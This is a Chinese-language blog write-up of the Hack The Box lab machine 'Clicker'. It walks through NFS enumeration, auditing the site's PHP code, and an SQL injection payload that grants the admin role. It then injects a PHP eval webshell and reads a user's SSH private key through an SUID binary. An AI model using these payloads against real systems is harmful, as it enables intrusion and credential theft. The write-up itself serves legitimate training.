Clicker-htb

最新推荐文章于 2024-06-27 09:50:07 发布
最新推荐文章于 2024-06-27 09:50:07 发布
阅读量721 收藏 28
点赞数 12
分类专栏: HTB 文章标签: 安全 hack the box sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/139434976
版权

0x01 立足

信息收集

端口扫描

从这里大致可以知道有web服务

使用了rpcbind,是一种通信协议,允许客户端调用远程服务器上的程序或服务。

简单来说RPC绑定服务充当了一个服务目录的角色,帮助客户端定位远程RPC服务的端口,从而使客户端能够与服务器进行通信

这里所需要注意的是开启的nfs共享

NFS共享是在NFS服务器上定义的文件系统或目录,可以被客户端挂载并访问

挂载nfs共享文件

使用showmount查看共享的是哪个文件

showmount -e 10.10.11.232

将共享的文件挂载到本地机子

这里是linux的挂载方法

mkdir -m 777 123

sudo mount -t nfs <NFS服务器IP或主机名>:<共享路径> <本地挂载点>

因为我使用的是wsl所以只能在主机windows上挂载

 New-PSDrive -Name M -PSProvider FileSystem -Root "\\10.10.11.232\mnt\backups" -Persist

将需要的文件拉去下来以后就可以用以下命令将挂载的M删掉

Remove-PSDrive -Name M

这里出现一个压缩文件看起来像是网站文件备份

php代码审计

从这里可以知道访问admin.php他会验证session里的role是否等于Admin

去找login.php这里发现将传入的数据给authenticate.php文件

分析authenticate.php

从这里能知道,它包含了一个db_utils.php

这里大概就能知道这是一个写了很多于数据库交互的函数的文件

登录以后他会调用db_utils.php文件里的load_profile函数,然后将从数据库查到的数据给session

这个session不是保存在本地的,是保存在服务器上的,通过每次的sessionip去获取,所以不能直接修改cookie上传session

到这里就到找到其他的能利用到的地方了

这里每次玩儿完可保存数据,并且对数据没有任何过滤,想保存什么就保存什么

从代码上来看调用了save_profile函数

这里就是重点了

foreach ($args as $key => $value) {}

这里首先是foreach将¥args也就是get传参进去的参数给变成一个类似数组的东西,

例如name=1那么进去以后键名就是name键值就是1

$setStr .= $key . "=" . $pdo->quote($value) . ",";

.=相当于是将$key . "=" . $pdo->quote($value) . ","插入到$setStr变量的最后

最后将这些参数通过update更新参数插入到数据库中

$pdo = new PDO("mysql:dbname=$db_name;host=$db_server", $db_username, $db_password);

function save_profile($player, $args) {
	global $pdo;
  	$params = ["player"=>$player];
	$setStr = "";
  	foreach ($args as $key => $value) {
    		$setStr .= $key . "=" . $pdo->quote($value) . ",";
	}
  	$setStr = rtrim($setStr, ",");  #rtrim从最右侧删除’,‘
  	$stmt = $pdo->prepare("UPDATE players SET $setStr WHERE username = :player");
  	$stmt -> execute($params);
}

这里又因为会去验证是否是role所以不能直接传

/save_game.php?clicks=0&level=0&role='Admin'

尝试保存数据抓包

payload:

?clicks%3d4,role%3d'Admin',clicks=4

防包以后重新登录就能有admin的功能点了

上传webshell

这里能看到可以保存数据,尝试抓包

从这里能明显看到数据以及保存的文件后缀名,尝试写入shell

访问以后似乎并没有写入

继续分析源代码

从这里看似乎是从数据库里拿的数据然后去保存

再次利用刚才的sql注入漏洞,尝试将webshell插入到Nickname字段

payload:

&nickname=<?php+eval($_POST['a']);?>

然后再重新保存一遍

拿到shell这里我使用的是curl反弹shell

0x02 拿用户权限

首先查看passwd文件能看到有除了root用户还有jack用户有权限

上linpeas.sh收集信息

攻击机python3开http服务

加运行权限然后跑出来给1.out

然后靶机开启http服务将1.out传回来用/parsePEASS工具把他转为html文件方便查看

sudo>1.9.5不存在版本漏洞

查看suid二进制文件的时候,这里出现一个不认识suid,并且发现拥有者是jack

进入到/opt/manage目录,看到有这个程序的说明

这里说实话不知道这个有什么用

这里去看了大佬的wp才知道这个可以拿来读文件

直接拿到了jack的ssh私钥

./execute_query 5 '../.ssh/id_rsa'

这里私钥的开头结尾是不对的

修改为

开头

-----BEGIN OPENSSH PRIVATE KEY-----

结尾

-----END OPENSSH PRIVATE KEY-----

拿到用户flag

0x03 提权

sudo -l看有root权限的程序

查看此程序的源码

这里可以简单知道通过curl获取数据然后保存为xml文件然后输出数据

#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi

set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;

data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml

看了下权限只有读和执行的权限

到这里后续没思路了,希望有大佬看到能指点以下,看了wp也不太能理解

答题器 - HTB |Gabe-Writeups (gaberoy.zip)

怪兽不会rap_哥哥我会crash
关注
  • 12
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[渗透测试学习] Clicker - HackTheBox
rev1ve的博客
01-10 793
NFS最大的功能就是可以透过网络,让不同的机器、不同的操作系统、可以彼此分享个别的档案(share files)。这个NFS服务器可以让你的PC来将网络远程的NFS服务器分享的目录,挂载到本地端的机器当中,在本地端的机器看起来,那个远程主机的目录就好像是自己的一个磁盘分区槽一样(partition),使用上相当的便利。否则,将会构建一个 MySQL 命令并执行它,因为拼接的路径为。很明显,保存的数据中只有nickname可以让我们写马,而如何修改nickname的值就和刚刚修改role一样的办法。
HTB Clicker WriteUp
qq_58869808的博客
10-01 1916
当我们把传入的前半部分都进行url编码 包括=号的时候,这样在后端判断的时候,就只会把我们传入的部分只当作 key,而value 为空,所以相当于我们传入的数据 (urlencode(role=‘Admin’)=>NULL),所以其实就是我们拥有了控制整个sql的权利,这里存在sql注入。,仔细看了看绕过的利用方式,并没有存在md5函数包裹,也就是这里我们不可以bypass,而且其实也没有什么作用,这个php只是返回了一些环境变量的信息。尝试用引号包裹起来,好像成功了,那么我们重新登录一下账号。
推荐开源项目:AutoClicker - 智能鼠标点击助手
gitblog_00075的博客
05-28 366
推荐开源项目:AutoClicker - 智能鼠标点击助手 项目地址:https://gitcode.com/oriash93/AutoClicker 项目介绍 AutoClicker 是一款高效实用的桌面应用工具,专为自动化鼠标的点击操作而设计。借助C#和WPF(Windows Presentation Foundation)的强大功能,AutoClicker可以帮助你在日常电脑使用中解放双手,...
探秘Auto Clicker - AutoFill: 您的网页操作自动化神器
gitblog_00063的博客
06-10 326
探秘Auto Clicker - AutoFill: 您的网页操作自动化神器 项目地址:https://gitcode.com/Dhruv-Techapps/acf-docs 项目介绍 在这个快节奏的数字时代,繁琐的重复操作往往让人不胜其烦。Auto Clicker - AutoFill正是为了解决这一痛点而生,它是一款高效实用的浏览器扩展程序,专为Google Chrome设计。通过智能化的自动...
Clicker - Linux
yutianovo的博客
03-16 479
Clicker - Linux
Number Clicker CodeForces - 995E(双向bfs)
babing2770的博客
09-15 209
双向bfs 注意数很大 用map来存 然后各种难受。。。。 转载于:https://www.cnblogs.com/WTSRUVF/p/9650191.html
Number Clicker CodeForces - 995E (中途相遇)
weixin_30258027的博客
02-18 181
链接 大意: 给定模数$p$, 假设当前在$x$, 则可以走到$x+1$, $x+p-1$, $x^{p-2}$ (mod p), 求任意一条从u到v不超过200步的路径 官方题解给了两个做法, 一个是直接双端搜索, 复杂度大概$O(\sqrt PlogP)$ 还有一种方法是求出两条u->1, v->1长度不超过100的路径, 通过随机生成一个数x, 再对$(ux...
推荐文章:探索自动点击新境界 - Auto-Clicker
gitblog_00040的博客
06-17 242
推荐文章:探索自动点击新境界 - Auto-Clicker 项目地址:https://gitcode.com/Srypto1992/Auto-Clicker 在自动化操作的洪流中,寻找一个既高效又易用的自动点击工具成为了许多人的需求。今天,我们要向您隆重介绍【Auto-Clicker】——这款专为Android用户设计的自动点击神器,它不仅简化了复杂的重复操作,更以其卓越的功能性与稳定性,在众多同...
auto clicker下载_RPG Auto Clicker(鼠标自动点击器)
weixin_39906114的博客
12-30 497
RPGAutoClicker是一款鼠标自动点击器,简单易用,功能强大,能够设置点击鼠标的键位、次数、时间间隔,在网上抢购的时候就非常有用了!。相关软件软件大小版本说明下载地址rpg Auto Clicker是一款鼠标自动点击器,简单易用,功能强大,能够设置点击鼠标的键位、次数、时间间隔,在网上抢购的时候就非常有用了!功能介绍1、【Times to Click (0=Infinite)】:设置点击次...
Auto Clicker - AutoFill-3.4.30.zip
12-27
名称:Auto Clicker - AutoFill -------------------- 版本:3.4.30 作者:https://getautoclicker.com/ 分类:生产工具 -------------------- 概述:自动填充输入字段或自动点击按钮或链接任何地方。您可以配置和...
AutoClicker - Free Auto Clicker Online-crx插件
04-01
AutoClicker-免费在线自动Clicker 自动点击器是一种软件或宏,可在某些点自动使您的鼠标点击。 它用于各种视频游戏和其他应用程序,您需要长时间在某些位置重复单击。 通过安装自动鼠标答题器,您就可以将手指和物理...
Auto Clicker - AutoFill-crx插件
04-02
欢迎来到Auto Clicker - AutoFill!!! !! !!在discord上有问题聊天:https://discord.gg/harvqns填写输入字段或单击按钮或在任何地方链接任何内容。轻松配置几个步骤,并像Pro一样工作自动单击/自动填充扩展与...
Cookie Clicker-2.0.8.zip
12-30
名称:Cookie Clicker ---------------------------------------- 版本:2.0.8 作者:Asc 分类:休闲娱乐 ---------------------------------------- 概述:Cookie Clicker 是一款令人兴奋的闲置答题器游戏。让自己...
临时关闭Windows安全中心
Chasingthewinds的博客
06-22 295
临时关闭微软安全中心
CAC 2.0融合智谱AI大模型,邮件安全新升级
CACTER_S的博客
06-21 477
CAC2.0反钓鱼防盗号已成功引入清华智谱ChatGLM大语言模型!
c++中串口的安全封装使用
jjjxxxhhh123的博客
06-21 342
对于内置类型,如果不显式初始化,它们的值是未定义的,可能包含任何内容。在你的代码中,buffer是一个字符数组,不需要显式初始化,因为你马上就会用::read函数把数据填充进去。字符串构造:如果::read返回负值,那么std::string(buffer, bytes_read)中的bytes_read将是负值,这会导致未定义行为。你需要确保bytes_read是非负的。在上述代码中,我添加了对read函数返回值的检查,以确保没有发生错误。如果::read返回负值,我们将抛出一个异常,以指示读取失败。
NAS安全存储怎样实现更精细的数据权限管控?
文件数据安全交换
06-25 499
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。3)文件的审批与安检。
自主可控的芯片设计供应链软件:保障芯片产业安全的关键
最新发布
YouyuanXway的博客
06-27 333
在当前的科技浪潮中,芯片作为信息技术的核心,其设计、制造和供应链的安全性和自主可控性显得尤为重要。而自主可控的芯片设计供应链软件,正是保障这一产业链安全的关键环节。
from PyQt5.QtCore import QTimer from PyQt5.QtGui import QCursor from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QLabel, QLineEdit, QPushButton class MouseClicker(QWidget): def init(self): super().init() # 设置窗口标题 self.setWindowTitle("鼠标连点器") # 创建UI界面 self.label_count = QLabel("点击次数:") self.edit_count = QLineEdit() self.label_interval = QLabel("间隔时间(ms):") self.edit_interval = QLineEdit() self.btn_start = QPushButton("开始") # 设置布局 layout_count = QHBoxLayout() layout_count.addWidget(self.label_count) layout_count.addWidget(self.edit_count) layout_interval = QHBoxLayout() layout_interval.addWidget(self.label_interval) layout_interval.addWidget(self.edit_interval) layout_main = QVBoxLayout() layout_main.addLayout(layout_count) layout_main.addLayout(layout_interval) layout_main.addWidget(self.btn_start) self.setLayout(layout_main) # 连接按钮的点击事件 self.btn_start.clicked.connect(self.start_clicking) # 创建计时器 self.timer = QTimer() self.timer.timeout.connect(self.click) def start_clicking(self): # 获取点击次数和间隔时间 count = int(self.edit_count.text()) interval = int(self.edit_interval.text()) # 设置计时器的时间间隔 self.timer.setInterval(interval) # 开始计时器 self.timer.start() # 禁用开始按钮 self.btn_start.setEnabled(False) # 设置光标样式为等待 QApplication.setOverrideCursor(QCursor(QtCore.Qt.WaitCursor)) # 记录已经点击的次数 self.clicked_count = 0 def click(self): # 点击鼠标左键 QCursor().pos() QCursor().setPos(100, 100) QCursor().pos() QApplication.processEvents() # 增加已经点击的次数 self.clicked_count += 1 # 如果达到设定的点击次数,停止计时器并启用开始按钮 if self.clicked_count >= int(self.edit_count.text()): self.timer.stop() self.btn_start.setEnabled(True) # 设置光标样式为默认 QApplication.restoreOverrideCursor() if name == "main": app = QApplication([]) mouse_clicker = MouseClicker() mouse_clicker.show() app.exec_() 打包为可执行文件
05-15
要将Python程序打包为可执行文件,可以使用第三方库PyInstaller。以下是使用PyInstaller将MouseClicker程序打包为可执行文件的步骤: 1. 安装PyInstaller 使用pip命令安装PyInstaller: ``` pip install pyinstaller ``` 2. 打包程序 在命令行中进入Python程序所在的目录,执行以下命令打包程序: ``` pyinstaller -F mouse_clicker.py ``` 其中,-F参数表示将所有依赖项打包为一个单独的可执行文件。 3. 运行程序 在dist目录中可以找到打包好的可执行文件。双击可执行文件即可运行程序。 注意:打包程序时,如果程序依赖于某些第三方库,需要在打包命令中添加--hidden-import参数指定要打包的依赖项。例如,如果程序依赖于PyQt5和PyQt5.QtCore,打包命令应该改为: ``` pyinstaller -F --hidden-import PyQt5 --hidden-import PyQt5.QtCore mouse_clicker.py ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值